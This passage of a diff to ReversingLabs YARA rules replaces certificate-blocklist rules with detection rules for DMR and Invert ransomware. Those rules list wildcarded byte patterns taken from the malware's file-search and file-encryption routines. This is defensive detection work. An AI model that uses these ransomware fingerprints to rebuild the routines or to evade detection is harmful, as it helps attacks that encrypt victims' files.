+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "55e19f3017c2cc8355c27f9a516e611b58b108f15bfed41b88d5662b55677a59"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DMR"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
+            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
+            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
+            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
+            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
+            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
+            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
+            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
+            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74
+        }
+		$find_files_p2 = {
+            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
+            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
+            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
+            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
+            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 55 ?? FF B5 ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            8B 55 ?? 88 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ??
+            ?? 8D 55 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 45 ??
+            83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 E0 ?? 8D 4D ?? 83 7D ?? ?? 50 0F 43
+        }
+		$encrypt_files_p2 = {
+            4D ?? 51 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 8D
+            ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ??
+            ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D BE ??
+            ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B C7 89 BD ?? ?? ?? ?? 72 ?? 8B 07 83 7F ?? ?? 75
+            ?? 0F B6 00 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? C7 86 ?? ?? ?? ?? ??
+            ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8B 86 ?? ?? ?? ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 8B 86 ?? ??
+            ?? ?? 83 7D ?? ?? 99 0F 43 4D ?? 52 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 8B 55 ?? 3B CA 77 ?? 83 7D ?? ?? 8D 45 ?? 89 4D ?? 0F 43 45 ?? C6 04 01 ??
+            EB ?? 8B 45 ?? 8B F9 2B FA 2B C2 3B F8 77 ?? 83 7D ?? ?? 8D 75 ?? 57 0F 43 75 ?? 03
+        }
+		$encrypt_files_p3 = {
+            F2 89 4D ?? 6A ?? 56 E8 ?? ?? ?? ?? C6 04 3E ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? EB ?? 6A
+            ?? 57 C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B BD ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8
+            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8D
+            85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8B 40 ?? FF D0 85 C0 74 ?? 8B
+            08 6A ?? 8B 11 8B C8 FF D2 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 D2 8B 40 ?? 03 C8
+            B8 ?? ?? ?? ?? 39 51 ?? 0F 45 C2 EB ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ??
+            03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 6A ?? 50 E8 ?? ?? ?? ??
+            81 C6 ?? ?? ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45
+        }
+		$encrypt_files_p4 = {
+            C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B 47 ?? 72 ?? 8B 3F 83 F8 ?? 75
+            ?? 0F B6 07 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B BD ?? ?? ?? ?? 85 C0 75 ?? 8D
+            45 ?? 50 83 EC ?? 8D 87 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC
+            ?? C6 45 ?? ?? 8B CC 56 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB ?? 8B BD ?? ??
+            ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ??
+            8D 45 ?? 3B C6 74 ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 FF 76 ?? 8D 4D ?? 50 E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 C7 46 ??
+            ?? ?? ?? ?? 8D 55 ?? C6 00 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? FF 75 ?? 0F 43 55 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ??
+            0B 41 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B C8 C6
+            45 ?? ?? 8B 41 ?? 8B 51 ?? 2B C2 83 F8 ?? 72 ?? 83 79 ?? ?? 8D 42 ?? 89 41 ?? 8B C1
+            72 ?? 8B 01 66 C7 04 02 ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 0F 10 01 0F 11 85 ?? ?? ?? ?? F3 0F 7E 41 ?? 66 0F D6 85 ?? ?? ?? ??
+            C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B
+        }
+		$encrypt_files_p5 = {
+            C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? C7 04 01 ?? ?? ?? ?? C6 44 01 ?? ?? 8D 85 ?? ?? ??
+            ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ??
+            ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ??
+            ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? 8D 47 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11
+            85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ??
+            ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83
+            F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ??
+            ?? 66 C7 04 08 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66
+            0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45
+        }
+		$encrypt_files_p6 = {
+            8B BD ?? ?? ?? ?? 8B C7 8B 8D ?? ?? ?? ?? 2B C1 8B 56 ?? 3B D0 76 ?? 8B 46 ?? 2B C2
+            3B C1 72 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 8B CE 50 6A ?? E8 ??
+            ?? ?? ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85
+            ?? ?? ?? ?? C6 00 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ??
+            ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 6A ?? 68 ?? ?? ?? ?? 83 F8 ?? 72 ?? 83 FA ??
+            8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 03 F1 89 85 ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 83 C4 ?? C6 46 ?? ?? 8D 85 ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 00 0F 11 45 ?? F3 0F 7E 40 ?? 66
+            0F D6 45 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? C6 45 ?? ?? 8B 95 ??
+            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
+            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45
+            ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ??
+            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ??
+            ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81
+        }
+		$encrypt_files_p7 = {
+            FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52
+            51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
+            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ??
+            8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ??
+            83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ??
+            83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
+            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B
+        }
+		$encrypt_files_p8 = {
+            95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
+            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 66 89 85 ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
+            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ??
+            8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
+            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 83 EC ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0
+            C6 45 ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ??
+            ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
+            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ??
+            ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
+        }
+		$encrypt_files_p9 = {
+            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ??
+            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
+            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D
+            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
+            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
+            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
+            8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ??
+            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55
+            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
+            83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
+            59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Remedica Medical Education and Publishing Ltd" and ( pe.signatures [ i ] . serial == "00:bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50" or pe.signatures [ i ] . serial == "bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50" ) and 1387151999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3E1656Dfcaacfed7C2D2564355698Aa3 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Invert : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Invert ransomware."
 		author = "ReversingLabs"
-		id = "57b75eaa-2cb2-5713-8eb3-065f90a1fdd5"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7ef77946-a902-5dc6-9b3c-b7b6a687eb96"
+		date = "2021-11-11"
+		modified = "2021-11-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2862-L2878"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ba7cca8d71f571644cabd3d491cddefffd05ca7a838f262a343a01e4a09bb72a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Invert.yara#L1-L66"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1608b8bbfc03b18a79752e60f211da7d7703862bc06b2ddf094074ae5efd0d14"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Invert"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            73 ?? ?? ?? ?? 0A 06 04 7D ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 25 2D
+            ?? 26 06 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 0C 7D ?? ?? ?? ?? 08 7E ?? ?? ?? ?? 25
+            2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ??
+            FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D
+            ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
